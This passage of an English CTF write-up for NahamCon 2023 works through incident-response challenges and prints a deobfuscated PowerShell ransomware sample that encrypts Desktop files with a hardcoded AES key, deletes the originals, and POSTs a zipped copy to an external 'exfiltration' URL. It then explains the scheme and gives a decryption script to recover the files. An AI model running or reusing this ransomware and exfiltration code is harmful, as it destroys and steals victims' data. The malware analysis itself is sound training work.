punctuation\">)</span>\n<span class=\"token variable\">$cipher</span> = <span class=\"token namespace\">[System.Security.Cryptography.SymmetricAlgorithm]</span>::Create<span 
class=\"token punctuation\">(</span><span class=\"token string\">\"AES\"</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>key = <span class=\"token namespace\">[System.Text.Encoding]</span>::UTF8<span class=\"token punctuation\">.</span>GetBytes<span class=\"token punctuation\">(</span><span class=\"token string\">\"7h3_k3y_70_unl0ck_4ll_7h3_f1l35!\"</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>Padding = <span class=\"token namespace\">[System.Security.Cryptography.PaddingMode]</span>::PKCS7\n<span class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>GenerateIV<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$FileStreamWriter</span><span class=\"token punctuation\">.</span><span class=\"token function\">Write</span><span class=\"token punctuation\">(</span><span class=\"token namespace\">[System.BitConverter]</span>::GetBytes<span class=\"token punctuation\">(</span><span class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>IV<span class=\"token punctuation\">.</span>Length<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> 0<span class=\"token punctuation\">,</span> 4<span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$FileStreamWriter</span><span class=\"token punctuation\">.</span><span class=\"token function\">Write</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>IV<span class=\"token punctuation\">,</span> 0<span class=\"token punctuation\">,</span> <span class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>IV<span class=\"token punctuation\">.</span>Length<span class=\"token 
punctuation\">)</span>\n<span class=\"token variable\">$Transform</span> = <span class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>CreateEncryptor<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$CryptoStream</span> = <span class=\"token function\">New-Object</span> System<span class=\"token punctuation\">.</span>Security<span class=\"token punctuation\">.</span>Cryptography<span class=\"token punctuation\">.</span>CryptoStream<span class=\"token punctuation\">(</span><span class=\"token variable\">$FileStreamWriter</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$Transform</span><span class=\"token punctuation\">,</span> <span class=\"token namespace\">[System.Security.Cryptography.CryptoStreamMode]</span>::<span class=\"token function\">Write</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$FileStreamReader</span><span class=\"token punctuation\">.</span>CopyTo<span class=\"token punctuation\">(</span><span class=\"token variable\">$CryptoStream</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$CryptoStream</span><span class=\"token punctuation\">.</span>FlushFinalBlock<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$CryptoStream</span><span class=\"token punctuation\">.</span>Close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$FileStreamReader</span><span class=\"token punctuation\">.</span>Close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$FileStreamWriter</span><span class=\"token punctuation\">.</span>Close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n<span class=\"token function\">Remove-Item</span> <span class=\"token 
operator\">-</span>LiteralPath <span class=\"token variable\">$File</span><span class=\"token punctuation\">.</span>FullName\n<span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token variable\">$flag</span> = <span class=\"token string\">\"flag{892a8921517dcecf90685d478aedf5e2}\"</span>\n<span class=\"token variable\">$ErrorActionPreference</span>= <span class=\"token string\">'silentlycontinue'</span>\n<span class=\"token variable\">$user</span> = <span class=\"token namespace\">[System.Security.Principal.WindowsIdentity]</span>::GetCurrent<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>Name<span class=\"token punctuation\">.</span>Split<span class=\"token punctuation\">(</span><span class=\"token string\">\"\\\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token operator\">-</span>1<span class=\"token punctuation\">]</span>\nencryptFiles<span class=\"token punctuation\">(</span><span class=\"token string\">\"C:\\Users\\\"</span><span class=\"token operator\">+</span><span class=\"token variable\">$user</span><span class=\"token operator\">+</span><span class=\"token string\">\"\\Desktop\"</span><span class=\"token punctuation\">)</span>\n<span class=\"token function\">Add-Type</span> <span class=\"token operator\">-</span>assembly <span class=\"token string\">\"system.io.compression.filesystem\"</span>\n<span class=\"token namespace\">[io.compression.zipfile]</span>::CreateFromDirectory<span class=\"token punctuation\">(</span><span class=\"token string\">\"C:\\Users\\\"</span><span class=\"token operator\">+</span><span class=\"token variable\">$user</span><span class=\"token operator\">+</span><span class=\"token string\">\"\\Desktop\"</span><span class=\"token punctuation\">,</span> <span class=\"token 
string\">\"C:\\Users\\\"</span><span class=\"token operator\">+</span><span class=\"token variable\">$user</span><span class=\"token operator\">+</span><span class=\"token string\">\"\\Downloads\\Desktop.zip\"</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$zipFileBytes</span> = <span class=\"token function\">Get-Content</span> <span class=\"token operator\">-</span>Path <span class=\"token punctuation\">(</span><span class=\"token string\">\"C:\\Users\\\"</span><span class=\"token operator\">+</span><span class=\"token variable\">$user</span><span class=\"token operator\">+</span><span class=\"token string\">\"\\Downloads\\Desktop.zip\"</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">-</span>Raw <span class=\"token operator\">-</span>Encoding Byte\n<span class=\"token variable\">$zipFileData</span> = <span class=\"token namespace\">[Convert]</span>::ToBase64String<span class=\"token punctuation\">(</span><span class=\"token variable\">$zipFileBytes</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$body</span> = <span class=\"token function\">ConvertTo-Json</span> <span class=\"token operator\">-</span>InputObject @<span class=\"token punctuation\">{</span>file=<span class=\"token variable\">$zipFileData</span><span class=\"token punctuation\">}</span>\n<span class=\"token function\">Invoke-Webrequest</span> <span class=\"token operator\">-</span>Method Post <span class=\"token operator\">-</span>Uri <span class=\"token string\">\"https://www.thepowershellhacker.com/exfiltration\"</span> <span class=\"token operator\">-</span>Body <span class=\"token variable\">$body</span>\n<span class=\"token function\">Remove-Item</span> <span class=\"token operator\">-</span>LiteralPath <span class=\"token punctuation\">(</span><span class=\"token string\">\"C:\\Users\\\"</span><span class=\"token operator\">+</span><span class=\"token variable\">$user</span><span class=\"token 
operator\">+</span><span class=\"token string\">\"\\Downloads\\Desktop.zip\"</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>The Flag hardcoded in plaintext in this script is the third Flag.</p>\n<h3 id=\"ir4\" style=\"position:relative;\"><a href=\"#ir4\" aria-label=\"ir4 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>IR4</h3>\n<blockquote>\n<p>Where is the data being exfiltrated? Please give the MD5 hash of the URL with the usual wrapper of flag{}.</p>\n</blockquote>\n<p>The deobfuscated script from the previous step shows that the malware exfiltrates data to <code class=\"language-text\">https://www[.]thepowershellhacker[.]com/exfiltration</code>.</p>\n<p>The MD5 hash of that URL, wrapped in <code class=\"language-text\">flag{}</code>, is the fourth Flag.</p>\n<h3 id=\"ir5\" style=\"position:relative;\"><a href=\"#ir5\" aria-label=\"ir5 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>IR5</h3>\n<blockquote>\n<p>Can you please recover our files?</p>\n</blockquote>\n<p>Reading the 
deobfuscated malware script shows that <code class=\"language-text\">encryptFiles</code> encrypts all files on the Desktop.</p>\n<p>Looking more closely, it uses AES in CBC mode with the key <code class=\"language-text\">7h3_k3y_70_unl0ck_4ll_7h3_f1l35!</code>.</p>\n<p>PKCS7 is the padding scheme used to pad plaintext to a multiple of the 16-byte AES block size.</p>\n<p>The encryption process uses the above key and a randomly generated IV, and prepends the IV’s size (4 bytes) followed by the IV bytes themselves to each encrypted file.</p>\n<p>Therefore, we can recover each file by extracting its IV from the beginning of the encrypted file and decrypting with AES-CBC using the known key.</p>\n<p>The following script was used for decryption:</p>\n<div class=\"gatsby-highlight\" data-language=\"powershell\"><pre class=\"language-powershell\"><code class=\"language-powershell\"><span class=\"token variable\">$baseDirectory</span> = <span class=\"token string\">\"E:\\Users\\IEUser\\Desktop\"</span>\n\n<span class=\"token keyword\">foreach</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$File</span> in <span class=\"token punctuation\">(</span><span class=\"token function\">Get-ChildItem</span> <span class=\"token variable\">$baseDirectory</span> <span class=\"token operator\">-</span>Recurse <span class=\"token operator\">-</span>File<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$File</span><span class=\"token punctuation\">.</span>extension <span class=\"token operator\">-eq</span> <span class=\"token string\">\".enc\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">{</span>\n        <span class=\"token variable\">$SourceFile</span> = <span class=\"token variable\">$File</span><span class=\"token 
punctuation\">.</span>FullName\n        <span class=\"token variable\">$DestinationFile</span> = <span class=\"token variable\">$File</span><span class=\"token punctuation\">.</span>FullName<span class=\"token punctuation\">.</span>Replace<span class=\"token punctuation\">(</span><span class=\"token string\">\".enc\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$DestinationFile</span>\n\n        <span class=\"token variable\">$FileStreamReader</span> = <span class=\"token function\">New-Object</span> System<span class=\"token punctuation\">.</span>IO<span class=\"token punctuation\">.</span>FileStream<span class=\"token punctuation\">(</span><span class=\"token variable\">$SourceFile</span><span class=\"token punctuation\">,</span> <span class=\"token namespace\">[System.IO.FileMode]</span>::Open<span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$FileStreamWriter</span> = <span class=\"token function\">New-Object</span> System<span class=\"token punctuation\">.</span>IO<span class=\"token punctuation\">.</span>FileStream<span class=\"token punctuation\">(</span><span class=\"token variable\">$DestinationFile</span><span class=\"token punctuation\">,</span> <span class=\"token namespace\">[System.IO.FileMode]</span>::Create<span class=\"token punctuation\">)</span>\n\n        <span class=\"token variable\">$cipher</span> = <span class=\"token namespace\">[System.Security.Cryptography.SymmetricAlgorithm]</span>::Create<span class=\"token punctuation\">(</span><span class=\"token string\">\"AES\"</span><span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>key = <span class=\"token namespace\">[System.Text.Encoding]</span>::UTF8<span class=\"token punctuation\">.</span>GetBytes<span class=\"token punctuation\">(</span><span 
class=\"token string\">\"7h3_k3y_70_unl0ck_4ll_7h3_f1l35!\"</span><span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>Padding = <span class=\"token namespace\">[System.Security.Cryptography.PaddingMode]</span>::PKCS7\n\n        <span class=\"token variable\">$IVLengthBuffer</span> = <span class=\"token function\">New-Object</span> Byte<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span> 4\n        <span class=\"token variable\">$FileStreamReader</span><span class=\"token punctuation\">.</span>Read<span class=\"token punctuation\">(</span><span class=\"token variable\">$IVLengthBuffer</span><span class=\"token punctuation\">,</span> 0<span class=\"token punctuation\">,</span> 4<span class=\"token punctuation\">)</span>\n\n        <span class=\"token variable\">$IVLength</span> = <span class=\"token namespace\">[System.BitConverter]</span>::ToInt32<span class=\"token punctuation\">(</span><span class=\"token variable\">$IVLengthBuffer</span><span class=\"token punctuation\">,</span> 0<span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$IVBuffer</span> = <span class=\"token function\">New-Object</span> Byte<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span> <span class=\"token variable\">$IVLength</span>\n\n        <span class=\"token variable\">$FileStreamReader</span><span class=\"token punctuation\">.</span>Read<span class=\"token punctuation\">(</span><span class=\"token variable\">$IVBuffer</span><span class=\"token punctuation\">,</span> 0<span class=\"token punctuation\">,</span> <span class=\"token variable\">$IVLength</span><span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>IV = <span class=\"token variable\">$IVBuffer</span>\n\n        <span class=\"token variable\">$Transform</span> = <span 
class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>CreateDecryptor<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$CryptoStream</span> = <span class=\"token function\">New-Object</span> System<span class=\"token punctuation\">.</span>Security<span class=\"token punctuation\">.</span>Cryptography<span class=\"token punctuation\">.</span>CryptoStream<span class=\"token punctuation\">(</span><span class=\"token variable\">$FileStreamWriter</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$Transform</span><span class=\"token punctuation\">,</span> <span class=\"token namespace\">[System.Security.Cryptography.CryptoStreamMode]</span>::<span class=\"token function\">Write</span><span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$FileStreamReader</span><span class=\"token punctuation\">.</span>CopyTo<span class=\"token punctuation\">(</span><span class=\"token variable\">$CryptoStream</span><span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$CryptoStream</span><span class=\"token punctuation\">.</span>FlushFinalBlock<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n        <span class=\"token variable\">$CryptoStream</span><span class=\"token punctuation\">.</span>Close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$FileStreamReader</span><span class=\"token punctuation\">.</span>Close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$FileStreamWriter</span><span class=\"token punctuation\">.</span>Close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">}</span>\n<span class=\"token 
punctuation\">}</span></code></pre></div>\n<p>The IV size is stored in the first 4 bytes of each encrypted file; this was used to extract the IV and decrypt the files.</p>\n<p>Inspecting the recovered files, I found a file named <code class=\"language-text\">NexGen Innovations.pdf</code> with a small Flag printed in the lower-left corner.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 804px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/e7a75a21f673c6909ef9a94b27a6f382/27b7a/image-20230618172636319.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 48.33333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA20lEQVQoz7VQ266EIBDj/79Po0a8gYoKrvq02Re7U3S/4HhIGgp0Oh2Ucw7DMKBtW4zjiHmeYYyB6TpYa+HcJOeLe+/Ry973feTUsWZd17hP0wSldYkiz9E0Deq6RpZlqKoKZSn3RRE579M0jY3JaZ7nGbTWUd9JczatxUPxkWbsxgJypmZHFhNM392JCeqSJJGkA3711BtjoULwWGRMxg0hYN93GeEV+bIsNzyO4xADG7/kEM31BQHbtsXxCQZReHip8zzxJP4r4XU4f+QvhrfVI2bR8P35PJrwC7cSAwHeG4AeAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/e7a75a21f673c6909ef9a94b27a6f382/8ac56/image-20230618172636319.webp 240w,\n/static/e7a75a21f673c6909ef9a94b27a6f382/d3be9/image-20230618172636319.webp 480w,\n/static/e7a75a21f673c6909ef9a94b27a6f382/95e88/image-20230618172636319.webp 804w\"\n              sizes=\"(max-width: 804px) 100vw, 804px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/e7a75a21f673c6909ef9a94b27a6f382/8ff5a/image-20230618172636319.png 240w,\n/static/e7a75a21f673c6909ef9a94b27a6f382/e85cb/image-20230618172636319.png 
480w,\n/static/e7a75a21f673c6909ef9a94b27a6f382/27b7a/image-20230618172636319.png 804w\"\n            sizes=\"(max-width: 804px) 100vw, 804px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/e7a75a21f673c6909ef9a94b27a6f382/27b7a/image-20230618172636319.png\"\n            alt=\"image-20230618172636319\"\n            title=\"image-20230618172636319\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"wrap-up\" style=\"position:relative;\"><a href=\"#wrap-up\" aria-label=\"wrap up permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Wrap-up</h2>\n<p>The Rev challenges this time were inexplicably hard and I couldn’t solve any of them.</p>\n<p>Rev has felt stagnant lately — I want to get to the point where I can tackle higher-difficulty problems.</p>","fields":{"slug":"/ctf-nahamCon-2023-en","tagSlugs":["/tag/ctf-en/","/tag/forensic-en/","/tag/english/"]},"frontmatter":{"date":"2023-06-18","description":"NahamCon 2023 CTF Writeup.","tags":["CTF (en)","Forensic (en)","English"],"title":"NahamCon 2023 Writeup","socialImage":{"publicURL":"/static/d143969d6f461311b81cdc93a5e43789/ctf-nahamCon-2023.png"}}}},"pageContext":{"slug":"/ctf-nahamCon-2023-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}